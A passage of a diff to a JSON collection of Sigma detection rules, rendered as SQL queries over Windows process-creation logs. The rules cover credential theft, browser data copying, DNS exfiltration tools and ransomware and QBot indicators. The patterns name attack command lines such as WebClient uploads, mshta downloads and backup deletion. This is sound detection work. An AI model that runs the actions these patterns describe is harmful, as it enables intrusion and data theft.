OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", 
- "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR 
CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "status": "experimental", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "System administrator usage", + "Anti virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE 
'%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "status": "experimental", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. 
This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Non Interactive PowerShell Process Spawned", - "id": "f4bbd493-b796-416e-bbf2-121235348529", - "status": "test", - "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", - "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "title": 
"Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate programs executing PowerShell scripts" + "Administrative activity" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_non_interactive_execution.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Potential Baby Shark Malware 
Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level", - "id": 
"87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN 
('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Suspicious ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "status": "experimental", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + 
"False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "status": "experimental", + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Unlikely" + "Legitimate administrative scripts may use this functionality. 
Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Legitimate use when App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Use Short Name Path in Image", + "id": "a96970af-f126-420d-90e1-d37bf25e50e1", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (NewProcessName LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR NewProcessName LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher", + 
"id": "b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ 